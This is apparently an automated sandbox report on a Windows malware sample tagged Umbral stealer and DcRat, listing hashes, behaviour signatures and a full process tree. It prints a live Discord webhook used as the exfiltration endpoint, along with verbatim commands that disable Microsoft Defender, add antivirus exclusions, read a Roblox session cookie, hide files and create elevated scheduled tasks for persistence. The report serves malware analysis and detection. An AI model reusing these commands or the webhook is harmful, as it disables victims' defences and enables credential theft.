Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
25-08-2024 01:05
General
-
Target
294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe
-
Size
3.4MB
-
MD5
392fcfb7445ce64079d2de971877520e
-
SHA1
68b4ab6a88385348fb1808286ac3586c15ef73ef
-
SHA256
294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c
-
SHA512
87ee7c6b2c6aa96779ab1c9c38e9ebb8f4c589681af31b164c261d84e86eac6e3e7b62beea1c37db912c2d49cbe28c28f1043f69d0b440328b52a482fc520f1c
-
SSDEEP
98304:h/tCnHVGIBfSIJ7tCHkurtT2zFhuR83VYpBSUKn:JtCHVgG7EttEuR8WpBSUKn
Score
10/10
Malware Config
Extracted
Family
umbral
C2
https://discord.com/api/webhooks/1273828074898718851/qR9eE6omxJxFL_jVry1J18IsVQ6bHhsk5rGr5VLxyO-92VJHyGPK43BBNMWtaUG56gE2
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 2 IoCs
-
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs 45 IoCs
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
DCRat payload 12 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Using powershell.exe command.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 35 IoCs
-
Loads dropped DLL 18 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 30 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 19 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 45 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe"C:\Users\Admin\AppData\Local\Temp\294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe"1⤵
- DcRat
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader0.exe"C:\Users\Admin\AppData\Local\Temp\loader0.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\reviewCrt\jVfhzQMFI0iTNziih7b.vbe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\reviewCrt\tYuCM.bat" "4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\reviewCrt\AgentDriversession.exe"C:\reviewCrt\AgentDriversession.exe"5⤵
- DcRat
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe"C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe"6⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f17c7741-50ac-422b-9ead-ca4d3ae21da3.vbs"7⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe8⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02c413c0-fca8-46fd-a46f-b50eeb934078.vbs"9⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe10⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\47007405-7322-4f19-bd32-2464a6e37511.vbs"11⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe12⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a1d5e753-9bf8-4480-90f4-233520dd5c96.vbs"13⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe14⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c6e22f8-ca89-4b09-b208-0cddc3b0f6cc.vbs"15⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe16⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc27bcad-d33b-47c4-a7c5-dbec7b69798b.vbs"17⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe18⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2268d92c-2510-4cc8-892a-4886bd0447eb.vbs"19⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe20⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\65734e84-6515-4622-a21c-c2bb7f60fd34.vbs"21⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe22⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f01c056e-7096-4456-a533-b6404a7fca33.vbs"23⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe24⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b6eca613-25d6-4b67-80d2-266d8af63cdc.vbs"25⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe26⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ab08314e-09fd-4102-ab34-2e5297ca702e.vbs"27⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe28⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79e0a2b9-a405-4985-89f3-5115955b39c9.vbs"29⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe30⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4c6256f1-74fb-4c31-9b07-caf8ce53a1a1.vbs"31⤵
-
C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exeC:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\taskhost.exe32⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\47533874-5812-413a-851b-c708517cd3d0.vbs"33⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\409f8d21-bccd-47bd-b575-5bdd42803457.vbs"33⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ODRYMD7Q2B6I8DF.exe"C:\Users\Admin\AppData\Local\Temp\ODRYMD7Q2B6I8DF.exe"33⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"34⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "35⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"36⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\86a815ec-ca8e-421f-87d8-ec57bd8662e0.vbs"31⤵
-
-
C:\Users\Admin\AppData\Local\Temp\580A58V1UEMAVVU.exe"C:\Users\Admin\AppData\Local\Temp\580A58V1UEMAVVU.exe"31⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"32⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "33⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"34⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\de595d89-dec9-4459-b66b-c12faf2061e1.vbs"29⤵
-
-
C:\Users\Admin\AppData\Local\Temp\LL3SXVX9XJ65WF3.exe"C:\Users\Admin\AppData\Local\Temp\LL3SXVX9XJ65WF3.exe"29⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"30⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "31⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"32⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a4763864-94fe-449f-8753-e010f102c6e9.vbs"27⤵
-
-
C:\Users\Admin\AppData\Local\Temp\N90VGJSF1RXIXO4.exe"C:\Users\Admin\AppData\Local\Temp\N90VGJSF1RXIXO4.exe"27⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"28⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "29⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"30⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d8053564-4c2b-4097-9123-fcd4bdfbb3ab.vbs"25⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5MW40X0YMP691J2.exe"C:\Users\Admin\AppData\Local\Temp\5MW40X0YMP691J2.exe"25⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"26⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "27⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"28⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\834960b4-495b-4fac-84b9-776fd59fcc60.vbs"23⤵
-
-
C:\Users\Admin\AppData\Local\Temp\DTKIVAUVGI8CTAP.exe"C:\Users\Admin\AppData\Local\Temp\DTKIVAUVGI8CTAP.exe"23⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"24⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "25⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"26⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2905e3e3-3935-44c6-abb7-71246611cda0.vbs"21⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c6853c60-a257-4683-9e58-fb1265f512e4.vbs"19⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bebeefbb-3c4f-4612-95a6-dfd5860ee319.vbs"17⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24f309bf-ed9d-4724-a257-0bb6f8d64f54.vbs"15⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8d453ad4-4a98-4c7d-b1a6-fc0d27804a1e.vbs"13⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5538f39d-0e3d-4e22-8544-90c3477b8809.vbs"11⤵
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95bd6528-3cda-4334-b672-f5f406bcf869.vbs"9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Z7ED7D6AEBEDW5F.exe"C:\Users\Admin\AppData\Local\Temp\Z7ED7D6AEBEDW5F.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"10⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "11⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe"C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"12⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\PortsurrogateWinhostdhcp\dllhost.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\OSPPSVC.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wscript.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Favorites\WMIADAP.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\reviewCrt\wscript.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe'13⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7hw9X6LRDA.bat"13⤵
-
C:\Windows\system32\chcp.comchcp 6500114⤵
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:214⤵
-
-
C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wscript.exe"C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\wscript.exe"14⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2ba09a8a-e210-43be-b4b2-2fa8f1fe4c9a.vbs"7⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\reviewCrt\file.vbs"3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\attrib.exe"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"4⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp3820.tmp.bat""4⤵
- Loads dropped DLL
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
-
C:\Users\Admin\Exec\$77svchost.exe"C:\Users\Admin\Exec\$77svchost.exe"5⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN $77svchost.exe6⤵
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /Create /SC ONCE /TN "$77svchost.exe" /TR "C:\Users\Admin\Exec\$77svchost.exe \"\$77svchost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST6⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\schtasks.exe"schtasks.exe" /query /TN $77svchost.exe6⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit6⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "svchost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:006⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\en-US\WmiPrvSE.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\en-US\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4bW" /sc MINUTE /mo 6 /tr "'C:\reviewCrt\WmZWbh4b.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4b" /sc ONLOGON /tr "'C:\reviewCrt\WmZWbh4b.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmZWbh4bW" /sc MINUTE /mo 12 /tr "'C:\reviewCrt\WmZWbh4b.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\winlogon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Recovery\8cdd6da2-3d81-11ef-9400-f2a3cf4ad94f\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
